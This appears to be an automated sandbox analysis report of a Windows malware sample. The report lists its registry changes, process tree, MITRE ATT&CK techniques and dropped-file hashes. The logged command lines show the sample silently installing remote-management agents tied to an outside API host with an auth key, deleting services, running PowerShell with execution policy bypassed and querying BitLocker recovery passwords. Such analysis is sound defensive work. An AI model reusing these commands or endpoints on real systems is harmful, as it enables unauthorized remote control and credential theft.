6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	tacticalrmm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	tacticalrmm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	tacticalrmm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 5c00000001000000040000000008000004000000010000001000000091de0625abdafd32170cbb25172a84670300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877619000000010000001000000063664b080559a094d10f0a3c5f4f629020000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	tacticalrmm.exe

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
1544	PING.EXE
2152	PING.EXE

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
968	tacticalrmm.exe
3020	tacticalrmm.exe
4560	powershell.exe
4560	powershell.exe
4560	powershell.exe
4968	powershell.exe
4968	powershell.exe
4968	powershell.exe
1808	powershell.exe
1808	powershell.exe
1808	powershell.exe
916	powershell.exe
916	powershell.exe
916	powershell.exe
3020	tacticalrmm.exe
3020	tacticalrmm.exe
2000	tacticalrmm.exe
2000	tacticalrmm.exe
2000	tacticalrmm.exe
2000	tacticalrmm.exe
2000	tacticalrmm.exe
2204	tacticalrmm.exe
4048	powershell.exe
4048	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3536	taskkill.exe
Token: SeDebugPrivilege	968	tacticalrmm.exe
Token: SeDebugPrivilege	3020	tacticalrmm.exe
Token: SeAssignPrimaryTokenPrivilege	4600	wmic.exe
Token: SeIncreaseQuotaPrivilege	4600	wmic.exe
Token: SeSecurityPrivilege	4600	wmic.exe
Token: SeTakeOwnershipPrivilege	4600	wmic.exe
Token: SeLoadDriverPrivilege	4600	wmic.exe
Token: SeSystemtimePrivilege	4600	wmic.exe
Token: SeBackupPrivilege	4600	wmic.exe
Token: SeRestorePrivilege	4600	wmic.exe
Token: SeShutdownPrivilege	4600	wmic.exe
Token: SeSystemEnvironmentPrivilege	4600	wmic.exe
Token: SeUndockPrivilege	4600	wmic.exe
Token: SeManageVolumePrivilege	4600	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	4600	wmic.exe
Token: SeIncreaseQuotaPrivilege	4600	wmic.exe
Token: SeSecurityPrivilege	4600	wmic.exe
Token: SeTakeOwnershipPrivilege	4600	wmic.exe
Token: SeLoadDriverPrivilege	4600	wmic.exe
Token: SeSystemtimePrivilege	4600	wmic.exe
Token: SeBackupPrivilege	4600	wmic.exe
Token: SeRestorePrivilege	4600	wmic.exe
Token: SeShutdownPrivilege	4600	wmic.exe
Token: SeSystemEnvironmentPrivilege	4600	wmic.exe
Token: SeUndockPrivilege	4600	wmic.exe
Token: SeManageVolumePrivilege	4600	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	2132	wmic.exe
Token: SeIncreaseQuotaPrivilege	2132	wmic.exe
Token: SeSecurityPrivilege	2132	wmic.exe
Token: SeTakeOwnershipPrivilege	2132	wmic.exe
Token: SeLoadDriverPrivilege	2132	wmic.exe
Token: SeSystemtimePrivilege	2132	wmic.exe
Token: SeBackupPrivilege	2132	wmic.exe
Token: SeRestorePrivilege	2132	wmic.exe
Token: SeShutdownPrivilege	2132	wmic.exe
Token: SeSystemEnvironmentPrivilege	2132	wmic.exe
Token: SeUndockPrivilege	2132	wmic.exe
Token: SeManageVolumePrivilege	2132	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	2132	wmic.exe
Token: SeIncreaseQuotaPrivilege	2132	wmic.exe
Token: SeSecurityPrivilege	2132	wmic.exe
Token: SeTakeOwnershipPrivilege	2132	wmic.exe
Token: SeLoadDriverPrivilege	2132	wmic.exe
Token: SeSystemtimePrivilege	2132	wmic.exe
Token: SeBackupPrivilege	2132	wmic.exe
Token: SeRestorePrivilege	2132	wmic.exe
Token: SeShutdownPrivilege	2132	wmic.exe
Token: SeSystemEnvironmentPrivilege	2132	wmic.exe
Token: SeUndockPrivilege	2132	wmic.exe
Token: SeManageVolumePrivilege	2132	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	2028	wmic.exe
Token: SeIncreaseQuotaPrivilege	2028	wmic.exe
Token: SeSecurityPrivilege	2028	wmic.exe
Token: SeTakeOwnershipPrivilege	2028	wmic.exe
Token: SeLoadDriverPrivilege	2028	wmic.exe
Token: SeSystemtimePrivilege	2028	wmic.exe
Token: SeBackupPrivilege	2028	wmic.exe
Token: SeRestorePrivilege	2028	wmic.exe
Token: SeShutdownPrivilege	2028	wmic.exe
Token: SeSystemEnvironmentPrivilege	2028	wmic.exe
Token: SeUndockPrivilege	2028	wmic.exe
Token: SeManageVolumePrivilege	2028	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	2028	wmic.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2676	tacticalagent-v2.7.0-windows-amd64.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1280 wrote to memory of 4652	1280	2024-05-02_089359e83c311755633b97cb26fef287_snatch.exe	88
PID 1280 wrote to memory of 4652	1280	2024-05-02_089359e83c311755633b97cb26fef287_snatch.exe	88
PID 1280 wrote to memory of 4652	1280	2024-05-02_089359e83c311755633b97cb26fef287_snatch.exe	88
PID 4652 wrote to memory of 2676	4652	tacticalagent-v2.7.0-windows-amd64.exe	89
PID 4652 wrote to memory of 2676	4652	tacticalagent-v2.7.0-windows-amd64.exe	89
PID 4652 wrote to memory of 2676	4652	tacticalagent-v2.7.0-windows-amd64.exe	89
PID 2676 wrote to memory of 4904	2676	tacticalagent-v2.7.0-windows-amd64.tmp	92
PID 2676 wrote to memory of 4904	2676	tacticalagent-v2.7.0-windows-amd64.tmp	92
PID 2676 wrote to memory of 4904	2676	tacticalagent-v2.7.0-windows-amd64.tmp	92
PID 4904 wrote to memory of 1544	4904	cmd.exe	94
PID 4904 wrote to memory of 1544	4904	cmd.exe	94
PID 4904 wrote to memory of 1544	4904	cmd.exe	94
PID 4904 wrote to memory of 1604	4904	cmd.exe	100
PID 4904 wrote to memory of 1604	4904	cmd.exe	100
PID 4904 wrote to memory of 1604	4904	cmd.exe	100
PID 1604 wrote to memory of 4692	1604	net.exe	101
PID 1604 wrote to memory of 4692	1604	net.exe	101
PID 1604 wrote to memory of 4692	1604	net.exe	101
PID 2676 wrote to memory of 3844	2676	tacticalagent-v2.7.0-windows-amd64.tmp	102
PID 2676 wrote to memory of 3844	2676	tacticalagent-v2.7.0-windows-amd64.tmp	102
PID 2676 wrote to memory of 3844	2676	tacticalagent-v2.7.0-windows-amd64.tmp	102
PID 3844 wrote to memory of 5064	3844	cmd.exe	104
PID 3844 wrote to memory of 5064	3844	cmd.exe	104
PID 3844 wrote to memory of 5064	3844	cmd.exe	104
PID 5064 wrote to memory of 1440	5064	net.exe	105
PID 5064 wrote to memory of 1440	5064	net.exe	105
PID 5064 wrote to memory of 1440	5064	net.exe	105
PID 2676 wrote to memory of 4184	2676	tacticalagent-v2.7.0-windows-amd64.tmp	106
PID 2676 wrote to memory of 4184	2676	tacticalagent-v2.7.0-windows-amd64.tmp	106
PID 2676 wrote to memory of 4184	2676	tacticalagent-v2.7.0-windows-amd64.tmp	106
PID 4184 wrote to memory of 2152	4184	cmd.exe	108
PID 4184 wrote to memory of 2152	4184	cmd.exe	108
PID 4184 wrote to memory of 2152	4184	cmd.exe	108
PID 4184 wrote to memory of 3084	4184	cmd.exe	109
PID 4184 wrote to memory of 3084	4184	cmd.exe	109
PID 4184 wrote to memory of 3084	4184	cmd.exe	109
PID 3084 wrote to memory of 372	3084	net.exe	110
PID 3084 wrote to memory of 372	3084	net.exe	110
PID 3084 wrote to memory of 372	3084	net.exe	110
PID 2676 wrote to memory of 1636	2676	tacticalagent-v2.7.0-windows-amd64.tmp	111
PID 2676 wrote to memory of 1636	2676	tacticalagent-v2.7.0-windows-amd64.tmp	111
PID 2676 wrote to memory of 1636	2676	tacticalagent-v2.7.0-windows-amd64.tmp	111
PID 1636 wrote to memory of 3536	1636	cmd.exe	113
PID 1636 wrote to memory of 3536	1636	cmd.exe	113
PID 1636 wrote to memory of 3536	1636	cmd.exe	113
PID 2676 wrote to memory of 4320	2676	tacticalagent-v2.7.0-windows-amd64.tmp	114
PID 2676 wrote to memory of 4320	2676	tacticalagent-v2.7.0-windows-amd64.tmp	114
PID 2676 wrote to memory of 4320	2676	tacticalagent-v2.7.0-windows-amd64.tmp	114
PID 4320 wrote to memory of 3532	4320	cmd.exe	116
PID 4320 wrote to memory of 3532	4320	cmd.exe	116
PID 4320 wrote to memory of 3532	4320	cmd.exe	116
PID 2676 wrote to memory of 1920	2676	tacticalagent-v2.7.0-windows-amd64.tmp	117
PID 2676 wrote to memory of 1920	2676	tacticalagent-v2.7.0-windows-amd64.tmp	117
PID 2676 wrote to memory of 1920	2676	tacticalagent-v2.7.0-windows-amd64.tmp	117
PID 1920 wrote to memory of 2320	1920	cmd.exe	119
PID 1920 wrote to memory of 2320	1920	cmd.exe	119
PID 1920 wrote to memory of 2320	1920	cmd.exe	119
PID 2676 wrote to memory of 3580	2676	tacticalagent-v2.7.0-windows-amd64.tmp	120
PID 2676 wrote to memory of 3580	2676	tacticalagent-v2.7.0-windows-amd64.tmp	120
PID 2676 wrote to memory of 3580	2676	tacticalagent-v2.7.0-windows-amd64.tmp	120
PID 3580 wrote to memory of 968	3580	cmd.exe	122
PID 3580 wrote to memory of 968	3580	cmd.exe	122
PID 2676 wrote to memory of 4572	2676	tacticalagent-v2.7.0-windows-amd64.tmp	124
PID 2676 wrote to memory of 4572	2676	tacticalagent-v2.7.0-windows-amd64.tmp	124

C:\Users\Admin\AppData\Local\Temp\2024-05-02_089359e83c311755633b97cb26fef287_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-02_089359e83c311755633b97cb26fef287_snatch.exe"
1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1280
- C:\ProgramData\TacticalRMM\tacticalagent-v2.7.0-windows-amd64.exe
  C:\ProgramData\TacticalRMM\tacticalagent-v2.7.0-windows-amd64.exe /VERYSILENT /SUPPRESSMSGBOXES
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4652
- - C:\Users\Admin\AppData\Local\Temp\is-KE3FL.tmp\tacticalagent-v2.7.0-windows-amd64.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-KE3FL.tmp\tacticalagent-v2.7.0-windows-amd64.tmp" /SL5="$60064,3651722,825344,C:\ProgramData\TacticalRMM\tacticalagent-v2.7.0-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2676
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4904
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 2
        5⤵
        Runs ping.exe
        
        PID:1544
    - - C:\Windows\SysWOW64\net.exe
        
        net stop tacticalrpc
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1604
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop tacticalrpc
        6⤵
        
        PID:4692
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c net stop tacticalagent
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3844
    - - C:\Windows\SysWOW64\net.exe
        
        net stop tacticalagent
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5064
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop tacticalagent
        6⤵
        
        PID:1440
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4184
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 2
        5⤵
        Runs ping.exe
        
        PID:2152
    - - C:\Windows\SysWOW64\net.exe
        
        net stop tacticalrmm
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3084
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop tacticalrmm
        6⤵
        
        PID:372
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1636
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM tacticalrmm.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3536
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c sc delete tacticalagent
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4320
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete tacticalagent
        5⤵
        Launches sc.exe
        
        PID:3532
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c sc delete tacticalrpc
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1920
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete tacticalrpc
        5⤵
        Launches sc.exe
        
        PID:2320
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c tacticalrmm.exe -m installsvc
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3580
    - - C:\Program Files\TacticalAgent\tacticalrmm.exe
        
        tacticalrmm.exe -m installsvc
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:968
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c net start tacticalrmm
      4⤵
      PID:4572
    - - C:\Windows\SysWOW64\net.exe
        
        net start tacticalrmm
        5⤵
        
        PID:2808
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start tacticalrmm
        6⤵
        
        PID:4256
- C:\Program Files\TacticalAgent\tacticalrmm.exe
  "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.safepall.online --client-id 1 --site-id 1 --agent-type server --auth dc9b8dc647b8cb244cd5f9dc218503e931caf14dde1fb52584c0c450c58a7011
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3020
- - C:\Program Files\TacticalAgent\meshagent.exe
    "C:\Program Files\TacticalAgent\meshagent.exe" -fullinstall
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    PID:5020
- - C:\Program Files\Mesh Agent\MeshAgent.exe
    "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
    3⤵
    - Executes dropped EXE
    PID:2580

C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1604
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4600
- C:\Windows\system32\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2132
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2028
- C:\Windows\system32\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:3576
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:4488
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:2308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:1808
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:916
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get C: -Type recoverypassword
  2⤵
  PID:1968
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get C: -Type recoverypassword
    3⤵
    PID:2916
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get F: -Type recoverypassword
  2⤵
  PID:1804
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get F: -Type recoverypassword
    3⤵
    PID:4912

C:\Program Files\TacticalAgent\tacticalrmm.exe
"C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2000
- C:\Program Files\TacticalAgent\tacticalrmm.exe
  "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m checkrunner
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2204
- C:\Program Files\TacticalAgent\py38-x64\python.exe
  "C:\Program Files\TacticalAgent\py38-x64\python.exe" C:\ProgramData\TacticalRMM\2007768622.py
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4668
- C:\Program Files\Mesh Agent\MeshAgent.exe
  "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
  2⤵
  - Executes dropped EXE
  PID:2544
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass C:\ProgramData\TacticalRMM\283299180.ps1
  2⤵
  - Blocklisted process makes network request
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4048
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\zqddxukn\zqddxukn.cmdline"
    3⤵
    PID:968
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES6712.tmp" "c:\Windows\Temp\zqddxukn\CSCC942E3CCFA640968FC26DC1F8B5F48F.TMP"
      4⤵
      PID:3120
- - C:\Windows\System32\setx.exe
    "C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate "133590987851200619"
    3⤵
    PID:1372
- - C:\Windows\System32\setx.exe
    "C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate "133590987863978829"
    3⤵
    PID:3140
- - C:\ProgramData\chocolatey\choco.exe
    "C:\ProgramData\chocolatey\choco.exe" -v
    3⤵
    - Executes dropped EXE
    PID:1108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mesh Agent\MeshAgent.db

Filesize
146KB

MD5
03a60e5e9ea308ce7a1dd78d67a67ed5

SHA1
4a6d65e2a1e86cc02e81987f6115ac2451c65c5a

SHA256
2ecd9bc56f05f983cf30024f97b05eb5e384c06482f5648598b122e461c0bef3

SHA512
ba8c94264ccb7b5b0693a882cd3b61b2478d3bafe1574f99dfaa0944871547069feabc2f4a719ee2d3b0b3ff897c60797d8d93eeec3cfd0e3fe0538d711772fd

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.db

Filesize
146KB

MD5
d89259abd3130f35794aca84e230dc80

SHA1
b1395c180fcf506126e2c15bff33032d7461d9b7

SHA256
c3df16252e5fb100577726621029e3648968c128c640f9f01137370bddfdef29

SHA512
c954b6d5428f4a4091026516f4c26853dd6a402aa04d06f7e02451308dae9a177346b582e1cc43b9ca9c5991d20e17358e503a06861da5ddaa6b4399402bf184

Download Submit
C:\Program Files\TacticalAgent\agent.log

Filesize
67B

MD5
897e2a0c9e77d24084ffb97aab823cc0

SHA1
93026a618523d0f16bbb81d4016df89e2f05dca1

SHA256
0ec2d0d74030c5e61a3a9a6cf0ea3f636876084a1574b428ad0cb077c05a7863

SHA512
0c0095cc003dd43f5974836431ead0bf07b4af4dfa9949a7e1e55929ffdb7fc908f9dfebb9ed85f837277a9f3316d3e60fb9d3ab08b899045fef543b50aae4b3

Download Submit
C:\Program Files\TacticalAgent\meshagent.exe

Filesize
3.3MB

MD5
ee331991cfc009385a17aa99b3ec961b

SHA1
598da977bca53ca64ec2a166b3572b8194d78e57

SHA256
cbb177b793a538b71e0df2be7db8a739acc7a81525c7b247e2908e1ef335a27d

SHA512
